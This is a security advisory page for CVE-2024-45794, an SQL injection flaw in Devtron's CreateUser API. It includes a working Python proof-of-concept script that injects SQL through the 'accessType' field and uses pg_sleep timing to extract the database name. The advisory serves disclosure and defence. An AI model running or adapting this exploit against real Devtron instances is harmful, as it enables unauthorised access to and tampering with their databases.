GHSA-q78v-cv36-8fxj
Suggest an improvement- Source
- https://github.com/advisories/GHSA-q78v-cv36-8fxj
- Import Source
- https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/11/GHSA-q78v-cv36-8fxj/GHSA-q78v-cv36-8fxj.json
- JSON Data
- https://api.test.osv.dev/v1/vulns/GHSA-q78v-cv36-8fxj
- Aliases
-
- CVE-2024-45794
- GO-2024-3260
- Published
- 2024-11-07T17:14:04Z
- Modified
- 2024-11-08T17:59:23.685058Z
- Severity
-
- 8.3 (High) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L CVSS Calculator
- 8.7 (High) CVSS_V4 - CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N CVSS Calculator
- Summary
- Devtron has SQL Injection in CreateUser API
- Details
-
Summary
An authenticated user (with minimum permission) could utilize and exploit SQL Injection to allow the execution of malicious SQL queries via CreateUser API (/orchestrator/user).
Details
The API is CreateUser (/orchestrator/user).
The function to read user input is: https://github.com/devtron-labs/devtron/blob/4296366ae288f3a67f87e547d2b946acbcd2dd65/api/auth/user/UserRestHandler.go#L96-L104
The userInfo (line 104) parameter can be controlled by users.
The SQL injection can happen in the code: https://github.com/devtron-labs/devtron/blob/4296366ae288f3a67f87e547d2b946acbcd2dd65/pkg/auth/user/repository/UserAuthRepository.go#L1038
The query (line 1038) parameter can be controlled by a user to create and execute a malicious SQL query.
The user should be authenticated but only needs minimum permissions:
PoC
Demonstrate a blind SQL injection to retrieve the database name:
import requests import time import string import argparse def blind(ip, token, query): url = f"http://{ip}/orchestrator/user" headers = {"token": token} entity = "chart-group" payload = f"'; {query} --" data = {"id": 111, "email_id": "abcd123@126.com", "superAdmin": False, "roleFilters":[{"team":"", "environment":"", "action": "", "entity": entity, "accessType": payload}]} #"EntityName": "test", "AccessType": "test", "Cluster": "",\"NameSpace": "devtroncd", "Group": "", "Kind": "", "Resource": "", "Workflow": "" start = time.time() res = requests.post(url, headers=headers, json = data) end = time.time() #print(res.content) if(end - start > 1): return True return False def main(ip, token): chs = string.printable result = "" is_end = False i = 1 while(not is_end): is_end = True for ch in chs: if(blind(ip, token, f"select case when substring(datname,{i},1)='{ch}' then pg_sleep(1) else pg_sleep(0) end from pg_database limit 1;")): print(ch) result += ch is_end = False break i += 1 print(result) if __name__ == "__main__": argparser = argparse.ArgumentParser() argparser.add_argument("--ip", "-i", type=str, help="Target IP") argparser.add_argument("--token", "-t", type=str, help="API TOKEN") args = argparser.parse_args() main(args.ip, args.token)The debugging breakpoint indicated that the malicious SQL query was executed:
We can see that we can get the database name:
Impact
SQL injection vulnerability. Our tests indicate that the latest version is affected.
The reporters are Yuan Luo, Shuai Xiong from Tencent YunDing Security Lab.
- Database specific
{ "nvd_published_at": "2024-11-07T18:15:17Z", "cwe_ids": [ "CWE-89" ], "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2024-11-07T17:14:04Z" }- References
Affected packages
Go / github.com/devtron-labs/devtron
Package
- Name
- github.com/devtron-labs/devtron
- View open source insights on deps.dev
- Purl
- pkg:golang/github.com/devtron-labs/devtron